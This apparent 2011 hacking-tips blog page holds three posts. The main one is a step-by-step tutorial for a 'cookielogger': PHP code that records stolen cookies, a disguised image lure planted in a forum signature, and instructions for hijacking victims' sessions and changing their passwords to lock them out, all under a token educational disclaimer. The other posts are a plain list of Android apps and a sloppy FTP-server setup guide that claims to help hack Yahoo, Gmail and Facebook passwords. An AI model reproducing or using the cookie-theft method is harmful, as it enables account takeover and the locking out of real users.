Thursday 10 February 2011

How to hack anyone accounts using Cookielogger?



javascript
Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger? A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif:
Download it.
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
http://0fees.net
Step 5: Go to the victim forum and insert this code in the signature or a post :
Download it.
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Go to the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Disclaimer:- I don’t take Responsibility for what you do with this script, it is served only for the Educational purpose only…

Top 10 Android Applications of all Time



Android_logo.svg_
Android is a mobile operating system initially developed by Android Inc. Today, Android is a leading competitor for mobile applications. Nowadays, many interesting and powerful mobile applications are developed for android operating system. Android is a platform for applications regarding gaming, entertainment, communication, finance, multimedia etc.

In this article we brings the most secure, interesting and the strongest Android Applications. To download Android Applications into your mobile phone you just need to launch theAndroid Market in the application menu, search for “desired application”, and easily install them.

1. Call & SMS Filter


Call & SMS Filter
Call & SMS Filter gives you a easy way to block noisy SMS & unwanted incoming calls.
Key Features:
- Choose block mode
- Add numbers/contacts to black list
- Block SMS & incoming calls
- Blocked SMS and call records
Package: com.easyfilter.android

2. Wheres My Phone


Wheres My Phone
Wheres My Phone lets you find your phone when you forgot where was your phone, you can send a SMS "easy finder" from another phone to make it vibrate or "sing" a song loudly, util you find it (even if it was set to vibrate mode).
Key Features:
* Send SMS by any phones;
* Send SMS by "Easy Filter"
Package: com.easyfinder.android

3. AndroPaint Lite


AndroPaint Lite
AndroPaint Lite is Paint application for the android platform.
Key Features:
-Brush styles,types
-Draw Shapes
-Fill action
-Add text
-Set as wallpaper
-Share image
-Undo/Redo
-Effects
-Resize
-Import, Edit images from storage
-Select image portion, drag to move or resize. Cut, copy, or paste.
-Save image as PNG/JPEG
-Fixed crash on large pics
Package: com.tecxten.andropaint.free

4. Risk Detector – MobileSecurity


Risk Detector – MobileSecurity
Risk Detector is a mobile security tool that is able to identify Virus/Spyware/Malware on current market. Protect your phone with Antivirus, AntiSpyware, AntiMalware & more.
Key Features:
- Block viruses, spyware, malware, theft aware
- Scan apps installed on your phone
Package: com.riskdetector.android

5. App Installer


App Installer
Install apps saved on your SD Card fast and easy. Search files.
Key Featrures:
*Create New Directory
*Search Files
*Delete Files
*(Un)Zip Files
*Filter Files
*Preview Media Files
*Install Saved Apps
Package: com.cdroid.appinstaller

6. Security Guarder


Security Guarder
Security Guarder is a mobile firewall to help you filter unwanted text messages and unsolicited call based on your own scenario rules.
Key Features:
It provides 7 scenario rules and you can customize the default rule according toyour own business.
Package: com.morbe.guarder

7. Scribtor Notes


Scribtor Notes
Scribtor Notes is Powerful notepad,text editor app.
Key Features:
-In built file browser
-Edit files
-Import contents of files from memory into the notepad
-Add short cuts for notes
-Exp notes to storage
-Customize the interface look
-Share data with other apps
-Encrypt and decrypt notes. Export, import the same
-Ln-de,es,fr,it,ja,zh
-much more
Package: com.tecxten.scribtor.free

8. ES Task Manager


ES Task Manager
ES Task Manager is an important app to ignore list to avoid to be killed. Also used for Saving Battery, Free Memory, Kill task, close everything, Uninstall app, Speed up phone.
Key Features:
*App2sd(NOT all phone can WIDGET on SD)
*Layout change
*Fix minor bug
*ignore list
Package: com.estrongs.android.taskmanager

9. Quick Task Killer Pro


Quick Task Killer Pro
Quick Task Killer is a tool to kill running tasks for speeding up your phone, saving your battery life.
Key Features:
-Kill All
-Auto Kill
-Widget
Package: com.quickkiller.android

10. Application Safer


Application Safer
Application Safer helps to keep your apps and private data safely.
Key Features:
-Prevent other people from intruding in your phone;
-Install/uninstall some apps or malware;
-See your private info you don't want to share;
-Save your life if your phone was lost;
You can download this all top 10 applications and more at the android Marketplace…

Create An Ftp Server On Your Pc







How to create an FTP Server on your computer using Ser-u? Their is a cool trick for changing ur pc into server.Hack yahoo,Gmail,facebook password by making servers & more.


Process 1:
First of all u have to get an static IP-Address.
Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside..


1.Goto no-ip & create urself a free account.


2.Now ur account been created & ll receive ur account password via mail to ur email address.


3.After getting ur password login to ur account of no-ip.com


4.After getting logged in, click upon add a HOST its on the left menu.


5.Type any hostname u want (eg:-saien) & select any domain from da given list (eg:-ftpserve.com) Click on Submit.


6.Now u have owned ur own static address (example: saien.serveftp.com)


7.Now click downloads button which is present above on the page & click on which operating system ur using & den download DNS update client or u can download it from here directly, this is for microsoft window users..


8.After getting downloaded, u have to install this software & login here with ur email addresss & p/w wen asked for it.


9.At last tick on da check box present at the static address.


10.U have ur own static web address.




Process 2:
Installation & setting of the FTP-Server


1.You have to install Serv-U 4.1.03 , download this software from here


2. Run Serv-U & use da wizard to setup ur FTP.


3.Click on next until u have been asked for IP-Address, leave it as it is & click upon next.


4.Enter ur domain name u have registered (example: rkchoolie.serveftp.com) it above in da domain field & click upon next.


5.U ll be asked for anonymous access, select No & click upon next.


6.Next u ll be asked for creating a named account, select yes & click upon next.


7.Choose any user name u wish (eg:-saien) & clcik upon next.


8.Enter password for dis account (eg:-@1254Rwn) for security purpose choose difficult password.


9.U ll be asked for da home directory for the account which u have created above.Select directory & click upon next.


10.Click on yes for locking dis account to da home directory, doing dis da user cannot further move up into home directory, click upon next.


11.At last ur account has been created click finish.


Process 3:
Configuring the user accounts which u have been created.


1.On the left tree-menu, select da account which u have been created above & den click upon General Tab.


2.Goto Hide 'Hidden' Files.


3. Check Allow only and enter the number one in the box.


4.Set da maximum downloading speed upto wat extent u want.As this is an account so many ll be using so set it low(eg:-10-20) to save ur bandwidth.Don't leave it blank as uers can download with full bandwidth.


5.choose how many users u want to login at on time.It depends on ur connection speed try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)


6.Click upon Dir Access Tab.


7.Now u can c home folder here.Highlight it & make ur permission.


8.If u want only users to download check only these Read,List & Inherit.


9.If u want ur users to upload into ur server & bu tto only 1 particular folder but not to downlaod, click upon dat add button & then select dat folder, Now u have to highlight dat folder & set these permissions on dat folder.Check,Write,Appened,List,Create & Inherit after setting these permissions click on the arrow which is present at the bottom right-hand corner.U want dis upload folder 2 be list first, before da home folder.


10.If der is any folder which u dont want anyone to access it, & it is present in the home folder, den click da add button & den select da folder.Now u have to highlight dat folder & see dat no all da checkboxes are left.After doing this click upon upper arrow which is present at bottom right hand corner.


11.There r many things u can do, These are only the basics....


12. Ur server is now ready to be connected..


13. Login with ur username & password...


Pls Pass Comment...

 

Copyright 2008 All Rights Reserved | Hackers-tips Designed by Bloggers Template | CSS done by Link Building